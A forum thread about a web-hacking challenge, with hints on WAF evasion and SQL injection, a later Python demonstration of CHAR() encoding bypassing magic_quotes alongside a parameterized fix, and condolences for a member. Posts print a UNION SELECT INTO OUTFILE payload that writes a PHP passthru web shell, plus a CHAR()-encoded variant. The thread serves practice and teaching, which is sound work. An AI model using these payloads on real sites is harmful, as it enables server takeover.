Security Challenge II (Web Hacking Intermediate)

  • 11-05-2011 12:23am
    #1
    Closed Accounts Posts: 20,759 ✭✭✭✭


    Rules.

    No need for brute forcing or exploits. No DoS attacks, or attacks on the network. Will be monitoring logs - anyone going outside the challenge will be blacklisted.

    Challenge: http://republicofhack.dyndns.org/

    Best of luck. I'd estimate the challenge to be of medium difficulty, more difficult than my previous challenge - but not as difficult as Damo's last challenge.


Comments

  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Sweet, will take a look at it after work.


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    Cool :)

    Also can I add, there is no need for any automated scanners. This challenge is doable manually, and requires nothing beyond a few browser addons.


  • Closed Accounts Posts: 18,966 ✭✭✭✭syklops


    Is it still up? Im getting connection timed out..... :(


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    Server is back up, sorry about that.


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    1 completed so far :)


  • Closed Accounts Posts: 18,966 ✭✭✭✭syklops


    Stuck on the login screen


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    syklops wrote: »
    Stuck on the login screen
    You'll need to figure out how it's validated and what exactly is validating it.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    done and done, nice challenge! :-)


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    Congrats Damo :) Glad you liked it.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Anyone else trying this?


  • Closed Accounts Posts: 2,486 ✭✭✭Redshift


    Is it possible to get SQLi through the WAF? I've tried various ways of encoding it :/ It's detected when plain, but when encoded I can't determine if anything is being executed because I can't see any feedback.


  • Closed Accounts Posts: 18,966 ✭✭✭✭syklops


    Redshift wrote: »
    Is it possible to get SQLi through the WAF? I've tried various ways of encoding it :/ It's detected when plain, but when encoded I can't determine if anything is being executed because I can't see any feedback.

    RedShift:
    I believe that SQLi is not necessary. Its something else...


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Redshift wrote: »
    Is it possible to get SQLi through the WAF? I've tried various ways of encoding it :/ It's detected when plain, but when encoded I can't determine if anything is being executed because I can't see any feedback.
    If you stuck on the WAF itself, try the most basic query and narrow it down until you find how its detected. You won't have to do complicated encodings.


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    Redshift:
    You're doing well, it's not a tough WAF - I promise. Google WAF evasion and see if you can find anything.


  • Closed Accounts Posts: 2,486 ✭✭✭Redshift


    Am I right in saying that I can't use union at all, as it's filtered, and that instead of going after password hashes I should try for a file using another keyword which is not filtered?
    Sorry if I'm not making sense.

    Will have another look tomorrow, have to get up for work :/


  • Registered Users, Registered Users 2 Posts: 36 chuckleberryfin


    Thanks for this, spent a bit too much time on
    checking the tables
    but was fun.


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    Redshift wrote: »
    Am I right in saying that I can't use union at all, as it's filtered, and that instead of going after password hashes I should try for a file using another keyword which is not filtered?
    Sorry if I'm not making sense.

    Will have another look tomorrow, have to get up for work :/
    You can use it but you need to evade the filter :) After that, there's another part - you'll see when you get there


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    chuckleberryfin wrote: »
    Thanks for this, spent a bit too much time on
    checking the tables
    but was fun.

    congrats! :)


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    Server will be down for a few hours.


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    Back up again :)


  • Closed Accounts Posts: 18,966 ✭✭✭✭syklops


    It's no good now, is it? Where was it at 8am this morning when I had time to throw sh1t at it? :mad:

    Seriously though, it's a great challenge. If I could only figure out where the Women's Auxiliary Air Force came into it.


  • Registered Users, Registered Users 2 Posts: 367 ✭✭900913


    Great challenge. I found one part really difficult.


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    900913 wrote: »
    Great challenge. I found one part really difficult.

    Msg me which part =)

    And congrats!


  • Closed Accounts Posts: 5,082 ✭✭✭Pygmalion


    chuckleberryfin wrote: »
    Thanks for this, spent a bit too much time on
    checking the tables
    but was fun.

    Same, I spent pretty much all last night trying to
    Find usernames/passwords in the SQL database
    , had a look at the
    WAF evasion
    today and got it within a few minutes :P.
    Also, apologies if my method of getting table and column names counted as brute-forcing or was a bit excessive, that was before I had a look at the WAF evasion and that was the only way I could think of to get them :P

    Also since 900913 is down as "900913 cheated" in the HoF, is there an interesting story behind this or something?
    Would be interesting to see how he did it if so :P


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    I sent him a message asking about that, I'm awaiting a response :)


  • Registered Users, Registered Users 2 Posts: 367 ✭✭900913


    I used an application(acunetix http editor) instead of a firefox plugin to postdata


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    There is some server abuse; if it continues, I will take it offline. This is the only warning. I hosted this challenge for people to have fun, not to abuse it.


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    Server offline on account of misbehaviour. Will be examining the logs and certain people will be blacklisted from future events.

    Successfully completed challenge:
    sk
    Damo2k
    netjester
    chuckleberryfinn
    900913
    Pygmalion


  • Closed Accounts Posts: 2,486 ✭✭✭Redshift


    Arrgh, just had that excited feeling of I think I know how to do this and just as I hit submit Bam Server gone.
    Damn you whoever was fooling about:mad:


  • Registered Users, Registered Users 2 Posts: 379 ✭✭jim_bob


    Me too, although I doubt I was as close :o

    Any chance of bringing it back?


  • Closed Accounts Posts: 2,486 ✭✭✭Redshift


    Any chance of the code? I'd love to install this on my VM and actually complete it.
    Might I suggest that in future you have to PM for the link to the challenge? It might put some of the morons off bothering and give those of us who actually want to learn how to hack manually a chance.
    Many thanks for hosting this and putting it together and I hope you are not put off doing more :)


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    Redshift - I'll put it back up tomorrow, just need to secure some things. Sorry about that.


  • Closed Accounts Posts: 2,486 ✭✭✭Redshift


    dlofnep wrote: »
    Redshift - I'll put it back up tomorrow, just need to secure some things. Sorry about that.

    You're a gent, thanks :)


  • Registered Users, Registered Users 2 Posts: 36 chuckleberryfin


    That's annoying, you could try some restricted access based on IPs, if the server wasn't compromised.


  • Registered Users, Registered Users 2 Posts: 367 ✭✭900913


    chuckleberryfin wrote: »
    That's annoying, you could try some restricted access based on IPs, if the server wasn't compromised.

    How would that work?


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    900913 wrote: »
    How would that work?

    A whitelist with iptables, but it's too much bother.


  • Registered Users, Registered Users 2 Posts: 367 ✭✭900913


    dlofnep wrote: »
    A whitelist with iptables, but it's too much bother.

    I thought MySQL 5.* was locked down to local access only.

    user:password:host in mysql.user
    root:167E7CDA67FDA14F9CCDA1B3AEFDDF49AA7xxxx:localhost

    If it was

    root:hash:%

    then I could possibly get access to MySQL.

    But by default the MySQL db is locked to local connections.

    Am I missing something?


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    I was referring to the server as a whole.


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    Sorry guys, I'll put the server back up tomorrow for anyone who wants to have another crack at it.


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    Sorry for the delay. Challenge back up: http://republicofhack.dyndns.org/


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    Anyone who may have attempted it yesterday, apologies - I didn't allocate the DB user sufficient privs to complete the challenge. Should be ok now :)


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    Who dropped the web-shell btw? ;) They get bonus points.


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    Alright lads - too many people toying with webshells. I've taken the challenge down.

    Completed
    sk
    Damo2k
    netjester
    chuckleberryfinn
    900913
    Pygmalion
    Sigtran
    rockethamster
    Redshift


  • Registered Users, Registered Users 2 Posts: 367 ✭✭900913


    How could anyone get a webshell uploaded?
    MySQL was locked to localhost,
    phpMyAdmin is blocked
    and magic_quotes_gpc = On.

    Those are the only ways I know to upload a shell using MySQL.

    The only other way I can think of is an LFI:
    ?id=null union select '<?php passthru($_GET[cmd]);?> OR R57 type Shell' into outfile '/tmp/shell'

    and then include it with the LFI. :confused:

    But that won't work with magic_quotes_gpc = on.


  • Closed Accounts Posts: 5,082 ✭✭✭Pygmalion


    900913 wrote: »
    How could anyone get a webshell uploaded?
    MySQL was locked to localhost,
    phpMyAdmin is blocked
    and magic_quotes_gpc = On.

    Those are the only ways I know to upload a shell using MySQL.

    The only other way I can think of is an LFI:
    ?id=null union select '<?php passthru($_GET[cmd]);?> OR R57 type Shell' into outfile '/tmp/shell'

    and then include it with the LFI. :confused:

    But that won't work with magic_quotes_gpc = on.

    But magic_quotes wasn't on :confused:

    Also, when magic quotes is on you can use the CHAR method to get strings into the query, so in this case SELECT '<?php passthru($_GET[cmd]);?> OR R57 type Shell' becomes SELECT CHAR(60, 63, 112, 104, 112, 32, 112, 97, 115, 115, 116, 104, 114, 117, 40, 36, 95, 71, 69, 84, 91, 99, 109, 100, 93, 41, 59, 63, 62, 32, 79, 82, 32, 82, 53, 55, 32, 116, 121, 112, 101, 32, 83, 104, 101, 108, 108) :P

    Handy for when people think magic_quotes or mysql_real_escape_string is some kind of magic catch-all, but use integer IDs that aren't ever actually treated as strings so have no quotes to escape :P.


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    900913 wrote: »
    How could anyone get a webshell uploaded?
    MySQL was locked to localhost,
    phpMyAdmin is blocked
    and magic_quotes_gpc = On.

    Those are the only ways I know to upload a shell using MySQL.

    The only other way I can think of is an LFI:
    ?id=null union select '<?php passthru($_GET[cmd]);?> OR R57 type Shell' into outfile '/tmp/shell'

    and then include it with the LFI. :confused:

    But that won't work with magic_quotes_gpc = on.

    It was uploaded to the webroot, which wasn't world-writeable. I will have a glance over the access logs later. It was from someone based in Ireland in any case; I saved their IP address. I'm curious myself. In any case, if the person involved wants to shoot me a friendly PM, I'd be happy to chat.


  • Registered Users, Registered Users 2 Posts: 367 ✭✭900913


    Pygmalion wrote: »
    But magic_quotes wasn't on :confused:

    Also, when magic quotes is on you can use the CHAR method to get strings into the query, so in this case SELECT '<?php passthru($_GET[cmd]);?> OR R57 type Shell' becomes SELECT CHAR(60, 63, 112, 104, 112, 32, 112, 97, 115, 115, 116, 104, 114, 117, 40, 36, 95, 71, 69, 84, 91, 99, 109, 100, 93, 41, 59, 63, 62, 32, 79, 82, 32, 82, 53, 55, 32, 116, 121, 112, 101, 32, 83, 104, 101, 108, 108) :P

    Handy for when people think magic_quotes or mysql_real_escape_string is some kind of magic catch-all, but use integer IDs that aren't ever actually treated as strings so have no quotes to escape :P.

    You still need quotes for "into outfile" or dumpfile. Otherwise you can't write your shell.
    '/tmp/shell'

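
    Pygmalion's CHAR() point and 900913's INTO OUTFILE caveat above, as an added example that is not from the original thread. It emulates magic_quotes_gpc with a Python addslashes() and runs the flawed query against sqlite3, whose char() builds a string from code points the same way MySQL's CHAR() does; the articles table and the query shape are constructed for the demo, not taken from the challenge. It shows that the escaping stops a quoted payload but not a CHAR()-encoded one when the id is interpolated unquoted, with the hardened lookup beside it. The file name after INTO OUTFILE has to be a string literal in MySQL, so that part of the chain still needs a quote character, which is the limit 900913 points out; sqlite has no OUTFILE, so it is not modelled here.

```python
import sqlite3

# sqlite3 stands in for MySQL here: its char(X1, ..., XN) builds a string from
# code points just like MySQL's CHAR(), which is all the demonstration needs.
# INTO OUTFILE has no sqlite equivalent and is discussed in prose only.


def magic_quotes(value: str) -> str:
    """Emulate PHP's magic_quotes_gpc (addslashes): backslash before ' " \\ and NUL."""
    out = []
    for ch in value:
        if ch in "'\"\\":
            out.append("\\" + ch)
        elif ch == "\0":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def to_char_expr(text: str) -> str:
    """Rewrite a string literal as CHAR(...), so the payload carries no quote
    characters for magic_quotes to escape."""
    return "CHAR(" + ", ".join(str(ord(c)) for c in text) + ")"


def make_db() -> sqlite3.Connection:
    """Constructed sample table; the challenge's real schema is not known."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?)",
                     [(1, "Welcome"), (2, "Challenge rules")])
    return conn


def vulnerable_lookup(conn, user_id: str):
    """The pattern Pygmalion describes: the parameter is 'escaped' but then
    interpolated unquoted, because the developer expects an integer.
    Returns the rows, or None if the database rejected the statement."""
    sql = f"SELECT title FROM articles WHERE id = {magic_quotes(user_id)}"
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.Error:
        return None


def safe_lookup(conn, user_id: str):
    """Hardened form: validate the type first, then bind it as a parameter."""
    try:
        ident = int(user_id)
    except ValueError:
        return []
    return [row[0] for row in
            conn.execute("SELECT title FROM articles WHERE id = ?", (ident,))]


if __name__ == "__main__":
    db = make_db()
    quoted = "null UNION SELECT 'pwned'"
    charred = "null UNION SELECT " + to_char_expr("pwned")
    print(vulnerable_lookup(db, "1"))
    print(vulnerable_lookup(db, quoted))    # None: \'pwned\' is a syntax error
    print(vulnerable_lookup(db, charred))   # ['pwned']: no quotes, nothing escaped
    print(safe_lookup(db, charred))         # []
```

    The quoted payload dies because addslashes turns 'pwned' into \'pwned\', which is not valid SQL outside a string; the CHAR() payload contains nothing for addslashes to touch and runs as written. The fix is the type check plus parameter binding in safe_lookup(), not a better escaping function: escaping only ever protects data that sits inside quotes.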

  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    Sorry for bumping an old thread - but just found out that Pygmalion was Paul Bunbury. Unfortunately, his body was found today. Very tragic, and my memory of his posts in the security forum is that he was a very capable hacker with a bright future.

    Very very sad.


  • Closed Accounts Posts: 2,486 ✭✭✭Redshift


    It's tragic to see the life of a talented young person cut short like this. I didn't know Paul other than from his posts in here. But RIP Pygmalion and my deepest condolences to his family and friends:(


  • Registered Users, Registered Users 2 Posts: 367 ✭✭900913


    Very very sad, he was only 19 years old.
    My thoughts are with his family and friends.
    RIP Pygmalion

